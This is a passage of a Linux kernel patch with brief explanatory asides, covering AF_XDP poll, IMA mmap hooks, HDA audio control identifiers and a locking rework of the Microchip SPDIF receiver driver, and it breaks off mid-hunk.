+ 	if (pool->cached_need_wakeup) {
+ 		if (xs->zc)
+ 			xsk_wakeup(xs, pool->cached_need_wakeup);
+-		else
++		else if (xs->tx)
+ 			/* Poll needs to drive Tx also in copy mode */
+-			xsk_xmit(sk);
++			xsk_generic_xmit(sk);
+ 	}
+ 
++skip_tx:
+ 	if (xs->rx && !xskq_prod_is_empty(xs->rx))
+ 		mask |= EPOLLIN | EPOLLRDNORM;
+ 	if (xs->tx && xsk_tx_writeable(xs))
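
The xsk rework above hoists the checks shared by sendmsg, recvmsg and poll into a single xsk_check_common() that returns 0 or a negative errno, so each entry point reduces to "common checks, then path-specific ones". A sketch of that layering, with hypothetical names:

	#include <errno.h>
	#include <stdbool.h>
	#include <stdio.h>

	struct sock_state { bool bound, dev_up, tx_ring, rx_ring; };

	/* Preconditions every entry point shares, factored out once. */
	static int check_common(const struct sock_state *s)
	{
		if (!s->bound)
			return -ENXIO;
		if (!s->dev_up)
			return -ENETDOWN;
		return 0;
	}

	static int do_sendmsg(const struct sock_state *s)
	{
		int err = check_common(s);

		if (err)
			return err;
		if (!s->tx_ring)
			return -ENOBUFS;	/* tx-specific check stays local */
		return 0;
	}

	static int do_recvmsg(const struct sock_state *s)
	{
		int err = check_common(s);

		if (err)
			return err;
		if (!s->rx_ring)
			return -ENOBUFS;
		return 0;
	}

	int main(void)
	{
		struct sock_state s = { .bound = true, .dev_up = false };

		printf("sendmsg: %d\n", do_sendmsg(&s));	/* -ENETDOWN */
		return 0;
	}
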
+diff --git a/scripts/bpf_doc.py b/scripts/bpf_doc.py
+index e8d90829f23ed..38d51e05c7a2b 100755
+--- a/scripts/bpf_doc.py
++++ b/scripts/bpf_doc.py
+@@ -271,7 +271,7 @@ class HeaderParser(object):
+             if capture:
+                 fn_defines_str += self.line
+                 helper_name = capture.expand(r'bpf_\1')
+-                self.helper_enum_vals[helper_name] = int(capture[2])
++                self.helper_enum_vals[helper_name] = int(capture.group(2))
+                 self.helper_enum_pos[helper_name] = i
+                 i += 1
+             else:
+diff --git a/scripts/gcc-plugins/Makefile b/scripts/gcc-plugins/Makefile
+index b34d11e226366..320afd3cf8e82 100644
+--- a/scripts/gcc-plugins/Makefile
++++ b/scripts/gcc-plugins/Makefile
+@@ -29,7 +29,7 @@ GCC_PLUGINS_DIR = $(shell $(CC) -print-file-name=plugin)
+ plugin_cxxflags	= -Wp,-MMD,$(depfile) $(KBUILD_HOSTCXXFLAGS) -fPIC \
+ 		  -include $(srctree)/include/linux/compiler-version.h \
+ 		  -DPLUGIN_VERSION=$(call stringify,$(KERNELVERSION)) \
+-		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) -std=gnu++11 \
++		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) \
+ 		  -fno-rtti -fno-exceptions -fasynchronous-unwind-tables \
+ 		  -ggdb -Wno-narrowing -Wno-unused-variable \
+ 		  -Wno-format-diag
+diff --git a/scripts/package/mkdebian b/scripts/package/mkdebian
+index 6cf383225b8b5..c3bbef7a6754f 100755
+--- a/scripts/package/mkdebian
++++ b/scripts/package/mkdebian
+@@ -236,7 +236,7 @@ binary-arch: build-arch
+ 	KBUILD_BUILD_VERSION=${revision} -f \$(srctree)/Makefile intdeb-pkg
+ 
+ clean:
+-	rm -rf debian/*tmp debian/files
++	rm -rf debian/files debian/linux-*
+ 	\$(MAKE) clean
+ 
+ binary: binary-arch
+diff --git a/security/integrity/ima/ima_api.c b/security/integrity/ima/ima_api.c
+index c1e76282b5ee5..1e3a7a4f8833f 100644
+--- a/security/integrity/ima/ima_api.c
++++ b/security/integrity/ima/ima_api.c
+@@ -292,7 +292,7 @@ int ima_collect_measurement(struct integrity_iint_cache *iint,
+ 		result = ima_calc_file_hash(file, &hash.hdr);
+ 	}
+ 
+-	if (result == -ENOMEM)
++	if (result && result != -EBADF && result != -EINVAL)
+ 		goto out;
+ 
+ 	length = sizeof(hash.hdr) + hash.hdr.length;
+diff --git a/security/integrity/ima/ima_main.c b/security/integrity/ima/ima_main.c
+index 377300973e6c5..53dc438009204 100644
+--- a/security/integrity/ima/ima_main.c
++++ b/security/integrity/ima/ima_main.c
+@@ -337,7 +337,7 @@ static int process_measurement(struct file *file, const struct cred *cred,
+ 	hash_algo = ima_get_hash_algo(xattr_value, xattr_len);
+ 
+ 	rc = ima_collect_measurement(iint, file, buf, size, hash_algo, modsig);
+-	if (rc == -ENOMEM)
++	if (rc != 0 && rc != -EBADF && rc != -EINVAL)
+ 		goto out_locked;
+ 
+ 	if (!pathbuf)	/* ima_rdwr_violation possibly pre-fetched */
+@@ -397,7 +397,9 @@ out:
+ /**
+  * ima_file_mmap - based on policy, collect/store measurement.
+  * @file: pointer to the file to be measured (May be NULL)
+- * @prot: contains the protection that will be applied by the kernel.
++ * @reqprot: protection requested by the application
++ * @prot: protection that will be applied by the kernel
++ * @flags: operational flags
+  *
+  * Measure files being mmapped executable based on the ima_must_measure()
+  * policy decision.
+@@ -405,7 +407,8 @@ out:
+  * On success return 0.  On integrity appraisal error, assuming the file
+  * is in policy and IMA-appraisal is in enforcing mode, return -EACCES.
+  */
+-int ima_file_mmap(struct file *file, unsigned long prot)
++int ima_file_mmap(struct file *file, unsigned long reqprot,
++		  unsigned long prot, unsigned long flags)
+ {
+ 	u32 secid;
+ 
+diff --git a/security/security.c b/security/security.c
+index d1571900a8c7d..174afa4fad813 100644
+--- a/security/security.c
++++ b/security/security.c
+@@ -1661,12 +1661,13 @@ static inline unsigned long mmap_prot(struct file *file, unsigned long prot)
+ int security_mmap_file(struct file *file, unsigned long prot,
+ 			unsigned long flags)
+ {
++	unsigned long prot_adj = mmap_prot(file, prot);
+ 	int ret;
+-	ret = call_int_hook(mmap_file, 0, file, prot,
+-					mmap_prot(file, prot), flags);
++
++	ret = call_int_hook(mmap_file, 0, file, prot, prot_adj, flags);
+ 	if (ret)
+ 		return ret;
+-	return ima_file_mmap(file, prot);
++	return ima_file_mmap(file, prot, prot_adj, flags);
+ }
+ 
+ int security_mmap_addr(unsigned long addr)
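
The security.c hunk computes the adjusted protection once and hands the IMA hook both values: reqprot is what the application asked for, prot is what the kernel will actually apply, possibly widened under a READ_IMPLIES_EXEC personality. A simplified userspace sketch of why the two can differ (the real adjustment in mmap_prot() also considers file mmap permissions):

	#include <stdio.h>

	#define PROT_READ  0x1UL
	#define PROT_EXEC  0x4UL

	/* Simplified mirror of the kernel's mmap_prot() adjustment: with a
	 * READ_IMPLIES_EXEC personality, a readable mapping is silently made
	 * executable, so a hook that only saw reqprot would miss executable
	 * mappings it ought to measure.
	 */
	static unsigned long adjust_prot(unsigned long reqprot,
					 int read_implies_exec)
	{
		if (read_implies_exec && (reqprot & PROT_READ))
			return reqprot | PROT_EXEC;
		return reqprot;
	}

	int main(void)
	{
		unsigned long reqprot = PROT_READ;
		unsigned long prot = adjust_prot(reqprot, 1);

		printf("reqprot=%#lx prot=%#lx\n", reqprot, prot);	/* 0x1 vs 0x5 */
		return 0;
	}
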
+diff --git a/sound/pci/hda/Kconfig b/sound/pci/hda/Kconfig
+index 06d304db4183c..886255a03e8b4 100644
+--- a/sound/pci/hda/Kconfig
++++ b/sound/pci/hda/Kconfig
+@@ -302,6 +302,20 @@ config SND_HDA_INTEL_HDMI_SILENT_STREAM
+ 	  This feature can impact power consumption as resources
+ 	  are kept reserved both at transmitter and receiver.
+ 
++config SND_HDA_CTL_DEV_ID
++	bool "Use the device identifier field for controls"
++	depends on SND_HDA_INTEL
++	help
++	  Say Y to use the device identifier field for (mixer)
++	  controls (the old behaviour, before this option existed).
++
++	  When enabled, multiple HDA codecs may set the device
++	  field in control (mixer) element identifiers. The use of
++	  this field is neither recommended nor defined for mixer controls.
++
++	  The old behaviour (Y) is obsolete and will be removed. Consider
++	  not enabling this option.
++
+ endif
+ 
+ endmenu
+diff --git a/sound/pci/hda/hda_codec.c b/sound/pci/hda/hda_codec.c
+index 2e728aad67713..9f79c0ac2bda7 100644
+--- a/sound/pci/hda/hda_codec.c
++++ b/sound/pci/hda/hda_codec.c
+@@ -3389,7 +3389,12 @@ int snd_hda_add_new_ctls(struct hda_codec *codec,
+ 			kctl = snd_ctl_new1(knew, codec);
+ 			if (!kctl)
+ 				return -ENOMEM;
+-			if (addr > 0)
++			/* Do not use the id.device field for MIXER elements.
++			 * This field is for real device numbers (like PCM), but codecs
++			 * are components hidden from the user-space view (unrelated
++			 * to mixer element identification).
++			 */
++			if (addr > 0 && codec->ctl_dev_id)
+ 				kctl->id.device = addr;
+ 			if (idx > 0)
+ 				kctl->id.index = idx;
+@@ -3400,9 +3405,11 @@ int snd_hda_add_new_ctls(struct hda_codec *codec,
+ 			 * the codec addr; if it still fails (or it's the
+ 			 * primary codec), then try another control index
+ 			 */
+-			if (!addr && codec->core.addr)
++			if (!addr && codec->core.addr) {
+ 				addr = codec->core.addr;
+-			else if (!idx && !knew->index) {
++				if (!codec->ctl_dev_id)
++					idx += 10 * addr;
++			} else if (!idx && !knew->index) {
+ 				idx = find_empty_mixer_ctl_idx(codec,
+ 							       knew->name, 0);
+ 				if (idx <= 0)
+diff --git a/sound/pci/hda/hda_controller.c b/sound/pci/hda/hda_controller.c
+index 0ff286b7b66be..083df287c1a48 100644
+--- a/sound/pci/hda/hda_controller.c
++++ b/sound/pci/hda/hda_controller.c
+@@ -1231,6 +1231,7 @@ int azx_probe_codecs(struct azx *chip, unsigned int max_slots)
+ 				continue;
+ 			codec->jackpoll_interval = chip->jackpoll_interval;
+ 			codec->beep_mode = chip->beep_mode;
++			codec->ctl_dev_id = chip->ctl_dev_id;
+ 			codecs++;
+ 		}
+ 	}
+diff --git a/sound/pci/hda/hda_controller.h b/sound/pci/hda/hda_controller.h
+index f5bf295eb8307..8556031bcd68e 100644
+--- a/sound/pci/hda/hda_controller.h
++++ b/sound/pci/hda/hda_controller.h
+@@ -124,6 +124,7 @@ struct azx {
+ 	/* HD codec */
+ 	int  codec_probe_mask; /* copied from probe_mask option */
+ 	unsigned int beep_mode;
++	bool ctl_dev_id;
+ 
+ #ifdef CONFIG_SND_HDA_PATCH_LOADER
+ 	const struct firmware *fw;
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 87002670c0c92..81c4a45254ff2 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -50,6 +50,7 @@
+ #include <sound/intel-dsp-config.h>
+ #include <linux/vgaarb.h>
+ #include <linux/vga_switcheroo.h>
++#include <linux/apple-gmux.h>
+ #include <linux/firmware.h>
+ #include <sound/hda_codec.h>
+ #include "hda_controller.h"
+@@ -119,6 +120,7 @@ static bool beep_mode[SNDRV_CARDS] = {[0 ... (SNDRV_CARDS-1)] =
+ 					CONFIG_SND_HDA_INPUT_BEEP_MODE};
+ #endif
+ static bool dmic_detect = 1;
++static bool ctl_dev_id = IS_ENABLED(CONFIG_SND_HDA_CTL_DEV_ID) ? 1 : 0;
+ 
+ module_param_array(index, int, NULL, 0444);
+ MODULE_PARM_DESC(index, "Index value for Intel HD audio interface.");
+@@ -157,6 +159,8 @@ module_param(dmic_detect, bool, 0444);
+ MODULE_PARM_DESC(dmic_detect, "Allow DSP driver selection (bypass this driver) "
+ 			     "(0=off, 1=on) (default=1); "
+ 		 "deprecated, use snd-intel-dspcfg.dsp_driver option instead");
++module_param(ctl_dev_id, bool, 0444);
++MODULE_PARM_DESC(ctl_dev_id, "Use control device identifier (based on codec address).");
+ 
+ #ifdef CONFIG_PM
+ static int param_set_xint(const char *val, const struct kernel_param *kp);
+@@ -1463,7 +1467,7 @@ static struct pci_dev *get_bound_vga(struct pci_dev *pci)
+ 				 * vgaswitcheroo.
+ 				 */
+ 				if (((p->class >> 16) == PCI_BASE_CLASS_DISPLAY) &&
+-				    atpx_present())
++				    (atpx_present() || apple_gmux_detect(NULL, NULL)))
+ 					return p;
+ 				pci_dev_put(p);
+ 			}
+@@ -2278,6 +2282,8 @@ static int azx_probe_continue(struct azx *chip)
+ 	chip->beep_mode = beep_mode[dev];
+ #endif
+ 
++	chip->ctl_dev_id = ctl_dev_id;
++
+ 	/* create codec instances */
+ 	if (bus->codec_mask) {
+ 		err = azx_probe_codecs(chip, azx_max_codecs[chip->driver_type]);
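
Together with the Kconfig entry added above, the new ctl_dev_id module parameter lets the old mixer-element numbering be restored at module load time without rebuilding the kernel. A hypothetical /etc/modprobe.d snippet (the parameter name and meaning come from the module_param() hunk above; 1 keeps the obsolete device-field behaviour, 0 maps the codec address into the control index instead, per the hda_codec.c hunk):

	# /etc/modprobe.d/hda.conf
	options snd-hda-intel ctl_dev_id=1
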
+diff --git a/sound/pci/hda/patch_ca0132.c b/sound/pci/hda/patch_ca0132.c
+index 0a292bf271f2e..acde4cd58785e 100644
+--- a/sound/pci/hda/patch_ca0132.c
++++ b/sound/pci/hda/patch_ca0132.c
+@@ -2455,7 +2455,7 @@ static int dspio_set_uint_param(struct hda_codec *codec, int mod_id,
+ static int dspio_alloc_dma_chan(struct hda_codec *codec, unsigned int *dma_chan)
+ {
+ 	int status = 0;
+-	unsigned int size = sizeof(dma_chan);
++	unsigned int size = sizeof(*dma_chan);
+ 
+ 	codec_dbg(codec, "     dspio_alloc_dma_chan() -- begin\n");
+ 	status = dspio_scp(codec, MASTERCONTROL, 0x20,
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index e103bb3693c06..d4819890374b5 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -11617,6 +11617,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1028, 0x0698, "Dell", ALC668_FIXUP_DELL_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1028, 0x069f, "Dell", ALC668_FIXUP_DELL_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x103c, 0x1632, "HP RP5800", ALC662_FIXUP_HP_RP5800),
++	SND_PCI_QUIRK(0x103c, 0x870c, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x8719, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x873e, "HP", ALC671_FIXUP_HP_HEADSET_MIC2),
+ 	SND_PCI_QUIRK(0x103c, 0x877e, "HP 288 Pro G6", ALC671_FIXUP_HP_HEADSET_MIC2),
+diff --git a/sound/pci/ice1712/aureon.c b/sound/pci/ice1712/aureon.c
+index 9a30f6d35d135..40a0e00950301 100644
+--- a/sound/pci/ice1712/aureon.c
++++ b/sound/pci/ice1712/aureon.c
+@@ -1892,6 +1892,7 @@ static int aureon_add_controls(struct snd_ice1712 *ice)
+ 		unsigned char id;
+ 		snd_ice1712_save_gpio_status(ice);
+ 		id = aureon_cs8415_get(ice, CS8415_ID);
++		snd_ice1712_restore_gpio_status(ice);
+ 		if (id != 0x41)
+ 			dev_info(ice->card->dev,
+ 				 "No CS8415 chip. Skipping CS8415 controls.\n");
+@@ -1909,7 +1910,6 @@ static int aureon_add_controls(struct snd_ice1712 *ice)
+ 					kctl->id.device = ice->pcm->device;
+ 			}
+ 		}
+-		snd_ice1712_restore_gpio_status(ice);
+ 	}
+ 
+ 	return 0;
+diff --git a/sound/soc/atmel/mchp-spdifrx.c b/sound/soc/atmel/mchp-spdifrx.c
+index ec0705cc40fab..76ce37f641ebd 100644
+--- a/sound/soc/atmel/mchp-spdifrx.c
++++ b/sound/soc/atmel/mchp-spdifrx.c
+@@ -217,7 +217,6 @@ struct mchp_spdifrx_ch_stat {
+ struct mchp_spdifrx_user_data {
+ 	unsigned char data[SPDIFRX_UD_BITS / 8];
+ 	struct completion done;
+-	spinlock_t lock;	/* protect access to user data */
+ };
+ 
+ struct mchp_spdifrx_mixer_control {
+@@ -231,13 +230,13 @@ struct mchp_spdifrx_mixer_control {
+ struct mchp_spdifrx_dev {
+ 	struct snd_dmaengine_dai_dma_data	capture;
+ 	struct mchp_spdifrx_mixer_control	control;
+-	spinlock_t				blockend_lock;	/* protect access to blockend_refcount */
+-	int					blockend_refcount;
++	struct mutex				mlock;
+ 	struct device				*dev;
+ 	struct regmap				*regmap;
+ 	struct clk				*pclk;
+ 	struct clk				*gclk;
+ 	unsigned int				fmt;
++	unsigned int				trigger_enabled;
+ 	unsigned int				gclk_enabled:1;
+ };
+ 
+@@ -275,37 +274,11 @@ static void mchp_spdifrx_channel_user_data_read(struct mchp_spdifrx_dev *dev,
+ 	}
+ }
+ 
+-/* called from non-atomic context only */
+-static void mchp_spdifrx_isr_blockend_en(struct mchp_spdifrx_dev *dev)
+-{
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&dev->blockend_lock, flags);
+-	dev->blockend_refcount++;
+-	/* don't enable BLOCKEND interrupt if it's already enabled */
+-	if (dev->blockend_refcount == 1)
+-		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_BLOCKEND);
+-	spin_unlock_irqrestore(&dev->blockend_lock, flags);
+-}
+-
+-/* called from atomic/non-atomic context */
+-static void mchp_spdifrx_isr_blockend_dis(struct mchp_spdifrx_dev *dev)
+-{
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&dev->blockend_lock, flags);
+-	dev->blockend_refcount--;
+-	/* don't enable BLOCKEND interrupt if it's already enabled */
+-	if (dev->blockend_refcount == 0)
+-		regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_BLOCKEND);
+-	spin_unlock_irqrestore(&dev->blockend_lock, flags);
+-}
+-
+ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ {
+ 	struct mchp_spdifrx_dev *dev = dev_id;
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+-	u32 sr, imr, pending, idr = 0;
++	u32 sr, imr, pending;
+ 	irqreturn_t ret = IRQ_NONE;
+ 	int ch;
+ 
+@@ -320,13 +293,10 @@ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ 
+ 	if (pending & SPDIFRX_IR_BLOCKEND) {
+ 		for (ch = 0; ch < SPDIFRX_CHANNELS; ch++) {
+-			spin_lock(&ctrl->user_data[ch].lock);
+ 			mchp_spdifrx_channel_user_data_read(dev, ch);
+-			spin_unlock(&ctrl->user_data[ch].lock);
+-
+ 			complete(&ctrl->user_data[ch].done);
+ 		}
+-		mchp_spdifrx_isr_blockend_dis(dev);
++		regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_BLOCKEND);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+@@ -334,7 +304,7 @@ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ 		if (pending & SPDIFRX_IR_CSC(ch)) {
+ 			mchp_spdifrx_channel_status_read(dev, ch);
+ 			complete(&ctrl->ch_stat[ch].done);
+-			idr |= SPDIFRX_IR_CSC(ch);
++			regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_CSC(ch));
+ 			ret = IRQ_HANDLED;
+ 		}
+ 	}
+@@ -344,8 +314,6 @@ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+-	regmap_write(dev->regmap, SPDIFRX_IDR, idr);
+-
+ 	return ret;
+ }
+ 
+@@ -353,47 +321,40 @@ static int mchp_spdifrx_trigger(struct snd_pcm_substream *substream, int cmd,
+ 				struct snd_soc_dai *dai)
+ {
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+-	u32 mr;
+-	int running;
+-	int ret;
+-
+-	regmap_read(dev->regmap, SPDIFRX_MR, &mr);
+-	running = !!(mr & SPDIFRX_MR_RXEN_ENABLE);
++	int ret = 0;
+ 
+ 	switch (cmd) {
+ 	case SNDRV_PCM_TRIGGER_START:
+ 	case SNDRV_PCM_TRIGGER_RESUME:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
+-		if (!running) {
+-			mr &= ~SPDIFRX_MR_RXEN_MASK;
+-			mr |= SPDIFRX_MR_RXEN_ENABLE;
+-			/* enable overrun interrupts */
+-			regmap_write(dev->regmap, SPDIFRX_IER,
+-				     SPDIFRX_IR_OVERRUN);
+-		}
++		mutex_lock(&dev->mlock);
++		/* Enable overrun interrupts */
++		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_OVERRUN);
++
++		/* Enable receiver. */
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_ENABLE);
++		dev->trigger_enabled = true;
++		mutex_unlock(&dev->mlock);
+ 		break;
+ 	case SNDRV_PCM_TRIGGER_STOP:
+ 	case SNDRV_PCM_TRIGGER_SUSPEND:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
+-		if (running) {
+-			mr &= ~SPDIFRX_MR_RXEN_MASK;
+-			mr |= SPDIFRX_MR_RXEN_DISABLE;
+-			/* disable overrun interrupts */
+-			regmap_write(dev->regmap, SPDIFRX_IDR,
+-				     SPDIFRX_IR_OVERRUN);
+-		}
++		mutex_lock(&dev->mlock);
++		/* Disable overrun interrupts */
++		regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_OVERRUN);
++
++		/* Disable receiver. */
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_DISABLE);
++		dev->trigger_enabled = false;
++		mutex_unlock(&dev->mlock);
+ 		break;
+ 	default:
+-		return -EINVAL;
+-	}
+-
+-	ret = regmap_write(dev->regmap, SPDIFRX_MR, mr);
+-	if (ret) {
+-		dev_err(dev->dev, "unable to enable/disable RX: %d\n", ret);
+-		return ret;
++		ret = -EINVAL;
+ 	}
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+@@ -401,7 +362,7 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 				  struct snd_soc_dai *dai)
+ {
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+-	u32 mr;
++	u32 mr = 0;
+ 	int ret;
+ 
+ 	dev_dbg(dev->dev, "%s() rate=%u format=%#x width=%u channels=%u\n",
+@@ -413,13 +374,6 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 		return -EINVAL;
+ 	}
+ 
+-	regmap_read(dev->regmap, SPDIFRX_MR, &mr);
+-
+-	if (mr & SPDIFRX_MR_RXEN_ENABLE) {
+-		dev_err(dev->dev, "PCM already running\n");
+-		return -EBUSY;
+-	}
+-
+ 	if (params_channels(params) != SPDIFRX_CHANNELS) {
+ 		dev_err(dev->dev, "unsupported number of channels: %d\n",
+ 			params_channels(params));
+@@ -445,6 +399,13 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 		return -EINVAL;
+ 	}
+ 
++	mutex_lock(&dev->mlock);
++	if (dev->trigger_enabled) {
++		dev_err(dev->dev, "PCM already running\n");
++		ret = -EBUSY;
++		goto unlock;
++	}
++
+ 	if (dev->gclk_enabled) {
+ 		clk_disable_unprepare(dev->gclk);
+ 		dev->gclk_enabled = 0;
+@@ -455,19 +416,24 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 		dev_err(dev->dev,
+ 			"unable to set gclk min rate: rate %u * ratio %u + 1\n",
+ 			params_rate(params), SPDIFRX_GCLK_RATIO_MIN);
+-		return ret;
++		goto unlock;
+ 	}
+ 	ret = clk_prepare_enable(dev->gclk);
+ 	if (ret) {
+ 		dev_err(dev->dev, "unable to enable gclk: %d\n", ret);
+-		return ret;
++		goto unlock;
+ 	}
+ 	dev->gclk_enabled = 1;
+ 
+ 	dev_dbg(dev->dev, "GCLK range min set to %d\n",
+ 		params_rate(params) * SPDIFRX_GCLK_RATIO_MIN + 1);
+ 
+-	return regmap_write(dev->regmap, SPDIFRX_MR, mr);
++	ret = regmap_write(dev->regmap, SPDIFRX_MR, mr);
++
++unlock:
++	mutex_unlock(&dev->mlock);
++
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_hw_free(struct snd_pcm_substream *substream,
+@@ -475,10 +441,12 @@ static int mchp_spdifrx_hw_free(struct snd_pcm_substream *substream,
+ {
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+ 
++	mutex_lock(&dev->mlock);
+ 	if (dev->gclk_enabled) {
+ 		clk_disable_unprepare(dev->gclk);
+ 		dev->gclk_enabled = 0;
+ 	}
++	mutex_unlock(&dev->mlock);
+ 	return 0;
+ }
+ 
+@@ -515,22 +483,51 @@ static int mchp_spdifrx_cs_get(struct mchp_spdifrx_dev *dev,
+ {
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+ 	struct mchp_spdifrx_ch_stat *ch_stat = &ctrl->ch_stat[channel];
+-	int ret;
+-
+-	regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_CSC(channel));
+-	/* check for new data available */
+-	ret = wait_for_completion_interruptible_timeout(&ch_stat->done,
+-							msecs_to_jiffies(100));
+-	/* IP might not be started or valid stream might not be present */
+-	if (ret < 0) {
+-		dev_dbg(dev->dev, "channel status for channel %d timeout\n",
+-			channel);
++	int ret = 0;
++
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * We may reach this point with both clocks enabled but the receiver
++	 * still disabled. To avoid waiting for a completion that would only
++	 * time out, check dev->trigger_enabled first.
++	 *
++	 * To retrieve data:
++	 * - if the receiver is enabled, the CSC IRQ will update the data in
++	 *   the software caches (ch_stat->data)
++	 * - otherwise we just update the software caches here with the latest
++	 *   available information and return it; in this case we don't need
++	 *   spin locking as the IRQ is disabled and will not be raised from
++	 *   anywhere else.
++	 */
++
++	if (dev->trigger_enabled) {
++		reinit_completion(&ch_stat->done);
++		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_CSC(channel));
++		/* Check for new data available */
++		ret = wait_for_completion_interruptible_timeout(&ch_stat->done,
++								msecs_to_jiffies(100));
++		/* Valid stream might not be present */
++		if (ret <= 0) {
++			dev_dbg(dev->dev, "channel status for channel %d timeout\n",
++				channel);
++			regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_CSC(channel));
++			ret = ret ? : -ETIMEDOUT;
++			goto unlock;
++		} else {
++			ret = 0;
++		}
++	} else {
++		/* Update software cache with latest channel status. */
++		mchp_spdifrx_channel_status_read(dev, channel);
+ 	}
+ 
+ 	memcpy(uvalue->value.iec958.status, ch_stat->data,
+ 	       sizeof(ch_stat->data));
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&dev->mlock);
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_cs1_get(struct snd_kcontrol *kcontrol,
+@@ -564,29 +561,49 @@ static int mchp_spdifrx_subcode_ch_get(struct mchp_spdifrx_dev *dev,
+ 				       int channel,
+ 				       struct snd_ctl_elem_value *uvalue)
+ {
+-	unsigned long flags;
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+ 	struct mchp_spdifrx_user_data *user_data = &ctrl->user_data[channel];
+-	int ret;
+-
+-	reinit_completion(&user_data->done);
+-	mchp_spdifrx_isr_blockend_en(dev);
+-	ret = wait_for_completion_interruptible_timeout(&user_data->done,
+-							msecs_to_jiffies(100));
+-	/* IP might not be started or valid stream might not be present */
+-	if (ret <= 0) {
+-		dev_dbg(dev->dev, "user data for channel %d timeout\n",
+-			channel);
+-		mchp_spdifrx_isr_blockend_dis(dev);
+-		return ret;
++	int ret = 0;
++
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * We may reach this point with both clocks enabled but the receiver
++	 * still disabled. To avoid waiting for a completion that would only
++	 * time out, we check the dev->trigger_enabled flag here.
++	 *
++	 * To retrieve data:
++	 * - if the receiver is enabled, we need to wait for the blockend IRQ
++	 *   to read the data and update the software caches for us
++	 * - otherwise reading the SPDIFRX_CHUD() registers is enough.
++	 */
++
++	if (dev->trigger_enabled) {
++		reinit_completion(&user_data->done);
++		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_BLOCKEND);
++		ret = wait_for_completion_interruptible_timeout(&user_data->done,
++								msecs_to_jiffies(100));
++		/* Valid stream might not be present. */
++		if (ret <= 0) {
++			dev_dbg(dev->dev, "user data for channel %d timeout\n",
++				channel);
++			regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_BLOCKEND);
++			ret = ret ? : -ETIMEDOUT;
++			goto unlock;
++		} else {
++			ret = 0;
++		}
++	} else {
++		/* Update software cache with last available data. */
++		mchp_spdifrx_channel_user_data_read(dev, channel);
+ 	}
+ 
+-	spin_lock_irqsave(&user_data->lock, flags);
+ 	memcpy(uvalue->value.iec958.subcode, user_data->data,
+ 	       sizeof(user_data->data));
+-	spin_unlock_irqrestore(&user_data->lock, flags);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&dev->mlock);
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_subcode_ch1_get(struct snd_kcontrol *kcontrol,
+@@ -627,10 +644,24 @@ static int mchp_spdifrx_ulock_get(struct snd_kcontrol *kcontrol,
+ 	u32 val;
+ 	bool ulock_old = ctrl->ulock;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-	ctrl->ulock = !(val & SPDIFRX_RSR_ULOCK);
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * The RSR.ULOCK bit holds a wrong value if both pclk and gclk are
++	 * enabled while the receiver is disabled. Thus we take
++	 * dev->trigger_enabled into account here to return the real status.
++	 */
++	if (dev->trigger_enabled) {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
